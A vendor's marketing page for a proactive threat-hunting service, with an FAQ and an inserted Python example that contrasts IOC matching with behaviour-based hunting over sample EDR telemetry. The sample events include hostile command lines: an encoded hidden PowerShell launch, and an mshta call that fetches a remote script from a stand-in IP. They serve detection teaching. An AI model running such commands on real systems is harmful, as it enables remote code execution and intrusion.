Cyber threat hunting services

Improves detection efficiency and cyber threat responses

Did you know that the average time to detect a security breach is 200 days, and that once a breach is detected it takes an average of 66 days to contain it? These figures show that current detection and response mechanisms are not sufficient.

Although most of the industry talks about threat hunting when describing its detection mechanisms, the reality is that very few organizations have developed a rigorous hunting approach.

Why Proactive Threat Hunting?

We all know organizations that invest considerable resources in detecting advanced threats without success. Some of them are even targeted by ransomware gangs precisely because they lack good detection and response capabilities.

This scenario is becoming more and more relevant as we learn that classic Threat Detection capabilities are not enough. We need to evolve from the traditional SOC to proactive Threat Hunting. This is achieved by focusing on TTP analysis instead of IOCs, by working from a compromise hypothesis instead of reacting only once a security event has been detected, and more.

Traditional SOC

  • Threat Detection: protects against well-known attacks.
  • Reactivity: work starts at the investigation stage of an alert or event.
  • Detection stack: SIEM, IDS, firewalls, proxy technologies, among others.
  • Known attacks: signature- and IOC-based detection.
  • Complex start-up: deployment of technology, creation of use cases, source diversity, blind spots, configuration faults, alerts and false positives.

Advanced approach

  • Threat Hunting: new forms of attack are investigated.
  • Proactivity: we continuously investigate under an undetected-breach scenario, assuming that a sophisticated attack has taken place and that no security event has been triggered.
  • Telemetry & deception: we collect and analyze activity from endpoints, servers and deception campaigns.
  • Targeted and unknown attacks: TTP-, intelligence-, tracking- and hypothesis-based detection.
  • Easy set-up: detection based on the telemetry provided by EDR/XDR technology.

What Makes our Threat Hunting Approach so Unique?

Our 24x7 Proactive Threat Hunting service understands malicious adversaries better than a regular SOC does, which makes it possible to detect and respond to Malicious Operations before a single security event has been raised. This is possible because our Proactive Threat Hunting service relies on the following fundamentals:

Technology Agnostic

Hunting over approved EDR/XDR

  • We continuously evaluate new technologies that allow us to deliver a high-quality Threat Hunting service
  • To maintain our quality standards, only technologies that pass our internal evaluation are used

Offensive Mindset

Understanding adversaries

  • Even when the technology produces no detection, our experts can identify Malicious Operations from the raw telemetry
  • We use our Red Team as a Threat Hunting accelerator
  • We deploy our own Threat Hunting Intelligence™ on top of the EDR/XDR detection capabilities

Compromise Hypothesis

Proactive hunting

  • Our service is a never-ending effort to maintain a proactive hunting position driven by compromise hypotheses
  • Working from compromise hypotheses allows us to detect previously unknown malicious actors
  • We run thousands of custom queries against the available telemetry every month to find unknown threats

World Class Team

Experts

  • Our hunters are genuine researchers who think like real adversaries
  • We provide a cutting-edge service informed by the most innovative attack techniques and detection-bypass possibilities
  • We draw on the most innovative technology to analyze emerging threats

Threat Hunting Intelligence ™ as a distinctive Threat Hunting accelerator

[Diagram: Threat Hunting Intelligence, fed by EDR/XDR gaps, threat actors, research, Red Team, malops and advisories]

Our Threat Hunting service is improved not only by continuous research into Malicious Operations, threat actor profiling and the analysis of public advisories, but also by strengthening detection capabilities for cases where the threat is able to bypass detection.

All those improvements are centralized in our Threat Hunting Intelligence™ and included in our unique Threat Hunting service.

In this context, it is particularly relevant that our Red Team is an excellent accelerator for improving our Threat Hunting service, and vice versa. In fact, more and more clients are requesting both services at the same time, with the following combined approach:

Red team Service

Our Red Team simulates threat actors and adversaries, and runs cyber exercises, to bypass defensive layers

We are continuously reporting improvement possibilities to the Threat Hunting team

Threat hunting Service

Our researchers continuously learn from the new tactics, techniques and procedures (TTPs) used by malicious actors, and that learning process is accelerated by Red Team exercises

Overcoming the EDR/XDR detection capabilities

With the aim of delivering an extraordinary Proactive Threat Hunting service, only extraordinary EDR/XDR solutions are accepted, and only after intensive testing, including evasion techniques, performed in our lab.

In addition to the detection capabilities offered by the EDR/XDR technology, our Threat Hunting service adds its own detection layer, performing thousands of additional detection checks tailored to each client environment.

*The technology approval process is a continuous evaluation of the most relevant EDR/XDR solutions, so if you use a technology not listed here, please contact us for further information.

Approved EDR/XDR technologies: CrowdStrike, SentinelOne, Microsoft Defender for Endpoint, Cortex.

Threat hunting FAQs

What is threat hunting?

Threat Hunting is a service aimed at proactively detecting advanced threats in corporate endpoints and networks using compromise-hypothesis approaches, and at responding to the compromise once found.

What are the benefits of threat hunting?

Threat Hunting is strongly recommended for detecting and responding to unknown threats. This is possible because, instead of focusing on Indicators of Compromise (IOCs), Threat Hunting focuses on the tactics, techniques and procedures (TTPs) catalogued by MITRE ATT&CK, so that Malicious Operations carried out by an APT can be detected even when no IOCs are available in advance.

What does a threat hunter do?

The work of a Threat Hunter covers the following activities:

  • Analyzing suspicious detections produced by the EDR or XDR technology, including the investigation needed to confirm a malicious operation or discard a false positive.
  • Threat research, which includes maintaining up-to-date, low-level knowledge of emerging critical vulnerabilities, exploits, APTs, attack campaigns, and the tactics, techniques and procedures a malicious actor could use to compromise an organization and its resources.
  • Turning the results of that research into proactive hunts by exploiting the available data and telemetry.

What are the types of threat hunting?

Although the objective is the same, Threat Hunting activities differ from traditional Threat Detection in how they achieve it. The main differences can be summarized as:

  • Threat Hunting searches proactively for unknown threats, while Threat Detection is a reactive process initiated once an alert arises.
  • Threat Hunting analyzes TTPs, while Threat Detection focuses on IOCs or well-known patterns.
  • Threat Hunting focuses on analyzing the data and telemetry provided by EDR or XDR technologies, while Threat Detection analyzes the events and logs centralized in a SIEM.
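The IOC-versus-TTP contrast made above (and in the "Compromise Hypothesis" and "Why Proactive Threat Hunting?" sections) can be shown concretely. The following is an added illustration, not code from this page or from any EDR/XDR vendor: it runs a reactive IOC match and a hypothesis-driven hunt ("a phishing document launched a script interpreter") over a handful of constructed process-creation records. The record schema, the IOC values and the sample events are all assumptions made for the example; a real hunt would query the EDR/XDR telemetry store instead of an in-memory list.

```python
"""Contrast IOC matching with a hypothesis-driven TTP hunt over EDR-style process telemetry.

Added example. The telemetry schema, field names, IOC values and sample events
below are assumptions constructed for illustration, not a real vendor format.
"""
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record as an EDR might emit it (assumed schema)."""
    host: str
    pid: int
    parent_image: str
    image: str
    cmdline: str
    sha256: str
    dest_ip: Optional[str] = None


OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample telemetry. Event 2001 is the same intrusion pattern as
# event 1002 but re-packed: its hash and C2 address differ, so no IOC matches.
# Event 3001 is a legitimate admin script launched from the desktop.
TELEMETRY = [
    ProcessEvent("ws01", 1001, r"C:\Windows\explorer.exe", OFFICE + r"\WINWORD.EXE",
                 '"WINWORD.EXE" /n "quarterly.docx"', "a" * 64),
    ProcessEvent("ws01", 1002, OFFICE + r"\WINWORD.EXE", PS,
                 "powershell.exe -nop -w hidden -enc SQBFAFgA", "b" * 64, "198.51.100.7"),
    ProcessEvent("ws02", 2001, OFFICE + r"\EXCEL.EXE", r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c mshta.exe http://203.0.113.9/x.hta", "c" * 64, "203.0.113.9"),
    ProcessEvent("ws03", 3001, r"C:\Windows\explorer.exe", PS,
                 "powershell.exe -File C:\\scripts\\backup.ps1", "d" * 64),
]

# Constructed IOC list: the hash and C2 address observed in an earlier incident.
KNOWN_IOCS = {"sha256": {"b" * 64}, "ip": {"198.51.100.7"}}

# Behavioural vocabulary for the hypothesis: Office parent -> script host child.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def ioc_matches(events, iocs=KNOWN_IOCS):
    """Reactive detection: flag only events whose hash or destination is on the IOC list."""
    return [e.pid for e in events if e.sha256 in iocs["sha256"] or e.dest_ip in iocs["ip"]]


def hunt_office_spawning_script_host(events):
    """Compromise hypothesis: 'a phishing document launched a script interpreter'.

    Queries the parent/child behaviour rather than any indicator, so it still fires
    on a re-packed payload with a fresh hash and C2 address, and stays quiet for a
    script host launched from explorer.exe.
    """
    return [e.pid for e in events
            if basename(e.parent_image) in OFFICE_APPS and basename(e.image) in SCRIPT_HOSTS]


def triage_note(events):
    """Summarise which events each approach surfaces, for the hunter's report."""
    ioc_hits = set(ioc_matches(events))
    ttp_hits = set(hunt_office_spawning_script_host(events))
    return {
        "ioc_only": sorted(ioc_hits - ttp_hits),
        "ttp_only": sorted(ttp_hits - ioc_hits),
        "both": sorted(ioc_hits & ttp_hits),
    }


if __name__ == "__main__":
    print(triage_note(TELEMETRY))
```

Run stand-alone it reports that the IOC list catches only the already-known sample (pid 1002), while the hypothesis query also surfaces the re-packed variant (pid 2001) and ignores the benign backup script, which is the practical difference between the two columns of the comparison above.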

What is a cyber hunt team?

Unlike a regular Threat Detection service, the team performing Threat Hunting activities is not organized in tiers. Instead, Threat Hunters are always highly skilled professionals who know how an attack works under the hood, so they can identify a malicious operation just by looking at the available resources, such as data and telemetry, even when no alert is associated with it.

Among the skills of a Threat Hunting team, the following stand out (among others):

  • Extensive experience with offensive techniques
  • An excellent understanding of Windows and Linux internals, as well as networking skills
  • Malware reverse engineering
  • Continuous research into emerging offensive techniques
  • Supporting other teams involved in an Incident Response